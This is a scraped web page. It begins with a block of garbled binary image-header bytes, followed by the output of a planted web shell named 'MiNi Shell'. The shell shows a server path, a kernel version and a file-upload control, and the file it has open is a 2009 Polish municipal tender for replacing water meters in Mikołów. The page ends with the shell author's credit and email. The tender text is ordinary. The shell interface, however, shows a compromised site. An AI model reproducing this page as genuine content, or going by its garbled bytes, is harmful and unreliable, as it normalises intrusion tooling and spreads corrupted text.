JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090409/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090409/99154-N-2009.html

<p class="kh_header"><b>Mikołów: Dostawa   wraz z wymianą  wodomierzy  suchobieżnych  do  wody  zimnej  i  ciepłej ok. 3.800szt                 w  zasobach mieszkaniowych i użytkowych  Zakładu Gospodarki Lokalowej  z siedzibą w Mikołowie</b><br>
<b>Numer ogłoszenia: 99154 - 2009; data zamieszczenia: 09.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Lokalowej , ul. Kolejowa 2, 43-190 Mikołów, woj. śląskie, tel. 032 3242600, faks 032 3242612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgl.mikolow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa   wraz z wymianą  wodomierzy  suchobieżnych  do  wody  zimnej  i  ciepłej ok. 3.800szt                 w  zasobach mieszkaniowych i użytkowych  Zakładu Gospodarki Lokalowej  z siedzibą w Mikołowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres rzeczowy robót stanowić będzie: <br>
a)Dostawa wraz  z   wymianą wodomierzy zimnej i ciepłej wody  ok 3.800szt , którym  upłynął  okres legalizacji, w lokalach mieszkalnych  zgodnie z  dodatkiem  nr  5  do  siwz.<br>

b)Ewentualna wymiana niesprawnych zaworów kulowych znajdujących  się  przed  wodomierzem ( wraz z materiałem) orientacyjna ilość ok 150szt. <br>

c)dokonanie  odczytu  wodomierza ( numer i stan)  przed  demontażem,<br>

d)Zdemontowanie wodomierzy,<br>

e)odkupienie od Zamawiającego  wszystkich  zdemontowanych  wodomierzy  i  materiałów towarzyszących   bez  względu  na producenta  i  stan  techniczny,( koszt odkupu wkalkulować w cenę oferowanych wodomierzy)<br>

f)wymiana uszczelek, ewentualnie śrubunków<br>

g)dokonanie  odczytu ( numer i stan) wodomierzy  po  zamontowaniu,<br>

h)oplombowanie wodomierzy plombą  dostarczoną przez Wykonawcę ,<br>

i)przeczyszczenia  sitek  na  śrubunkach  w  przypadku, gdy  wodomierz stoi  w  okresie  trwania gwarancji,<br>

j)sporządzenie protokołu  wymiany wg  wzoru stanowiącego  dodatek nr  6  do  siwz.<br>


2. Zabudowane wodomierze  posiadać muszą co najmniej następujące cechy:<br>

a)minimalna klasa metrologiczna B w poziomie i A w pionowej  pozycji  zabudowy  dla  wodomierzy do wody zimnej  wg  dyrektywy UE  nr 75-33-EEC  oraz  do  wody  ciepłej  wg  dyrektywy 79-830-EEC,<br>

b)wodomierze powinny  spełniać  wymagania  Rozporządzenia  Ministra  Gospodarki  z  dnia  18 grudnia 2006r  w  sprawie zasadniczych wymagań  dla  przyrządów pomiarowych (Dz.U. z 2007r. Nr 3, poz.27),<br>

c)zabezpieczenie  przed tworzeniem  się  skroplin  na  wewnętrznej stronie  przeźroczystej  okna urządzenia  wskazującego  wodomierz,<br>

d)korpus  wykonany  z  mosiądzu lub  brązu,<br>

e)urządzenie wskazujące  powinno  zapewnić  jednoznaczny  odczyt  przepływu wody  wyrażonych w metrach sześciennych (1m3 h),<br>

f)długość montażowa 110mm,<br>

g)zabezpieczenie osłony  licznika przed  zewnętrzną  ingerencją ( ściskanie,możliwośc  oddzielenia liczydła  od  korpusa itp.),<br>

h)zabezpieczenie  przed  zewnętrznym  polem  magnetycznym (magnesy neodymowe),<br>

i)wysoka wytrzymałość  i  trwałość  zastosowanych  materiałów,<br>

j)wyposażenie  w  zewnętrzne  urządzenie  kontroli  ingerencji  magnesem,<br>

k)zastosowanie ułożyskowienia  wirnika,<br>

l)łączniki  z  wbudowanym  zaworem  zwrotnym  wykonane  z  mosiądzu,<br>

m)atest  Państwowego  Zakładu  Higieny dla wody pitnej,<br>

n)aktualne zatwierdzenie  typu  lub  deklaracji  zgodności,<br>

o)cecha  legalizacyjna  zgodnie  z  przepisami  Głównego  Urzędu  Miar<br>

p)plomby  zastosowane podczas  wymiany  wodomierzy  muszą  być  plastikowe  zatrzaskowe  numerowane  oraz  z logo  Zamawiającego ZGL Mikołów <br>

3.Informujemy, iż  zasoby Zamawiającego są bardzo  zróżnicowane ze  względu  m.in. na  lata budowy, kubaturę budynków. W  celu  uzyskania bliższej  informacji na ww. temat  prosimy   o  kontakt  z   Administracją ZGL-u.<br>

4.Szczegółowy zestawienie adresów, a  jednocześnie kolejność  wykonywania  usług , pod którymi montowane będą wodomierze, stanowi dodatek nr 5 do specyfikacji istotnych warunków zamówienia.       Wykonawca  zobowiązany  jest do skutecznego informowania  lokatorów ( czasami kilkakrotnie)  jak  również  administrację  o terminie  wymiany wodomierzy  na poszczególnych  budynkach. <br>

5.Miejsce wykonywania usługi: Mikołów, budynki administrowane przez Zakład Gospodarki Lokalowej <br>.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 51.21.00.00-7, 38.42.11.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 4000.00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy którzy: <br>
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień<br>

b)posiadają niezbędną wiedzę i doświadczenie  oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.<br>

c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,<br>

d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 lub 2 ustawy Prawo zamówień publicznych <br>

W celu potwierdzenia powyższego Wykonawca zobowiązany jest złożyć następujące dokumenty:<br>.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> -aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert <br>
-oświadczenie o spełnianiu warunków udziału w postępowaniu<br>
-aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,<br>
-Atesty  higieniczne PZH  do  wody  pitnej  na  dostarczone wodomierze<br>
- Karty  katalogowe  producenta  w języku polskim  dla  oferowanych produktów<br>
- 2 sztuki wodomierzy po jednym dla zimnej i ciepłej wody 
Wodomierz wygranego - własność ZGL
Wodomierz przegranego-   do  odbioru w  siedzibie  zamawiającego po rozstrzygnięciu przetargu<br>
-Dokument  autoryzacji  wystawionych przez producenta  wodomierzy, chyba że wykonawca  sam jest producentem,<br>
-wykaz wykonanych , a  w  przypadku  świadczeń  okresowych  lub  ciągłych  również  wykonywanych, dostaw    w  okresie  ostatnich trzech  lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w  tym okresie, odpowiadających swoim rodzajem i wartością   dostawom   stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania  i  odbiorców oraz załączenia dokumentów potwierdzających, że dostawy   zostały wykonane należycie  - z wykazu musi wynikać, iż Wykonawca zrealizował min. 5  dostaw   wraz z montażem  wodomierzy  w  zasobach mieszkaniowych   w  ilości  co  najmniej 3.800 szt. Każda - wzór stanowi dodatek nr 4 do SIWZ<br>
-informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej,w którym wykonawca posiada  rachunek, potwierdzająca posiadanie min. 200.000,00 zł środków finansowych lub zdolności kredytowej wykonawcy,wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert<br>
-kopia polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej  przy minimalnej sumie ubezpieczenia nie mniejszej niż równowartość 200.000,00 zł<br>.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgl.mikolow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego pok nr 201 
ul.Kolejowa 2
43-190 Mikołów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 09:00, miejsce: siedziba Zamawiającego pok nr 202 
ul.Kolejowa 2
43-190 Mikołów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com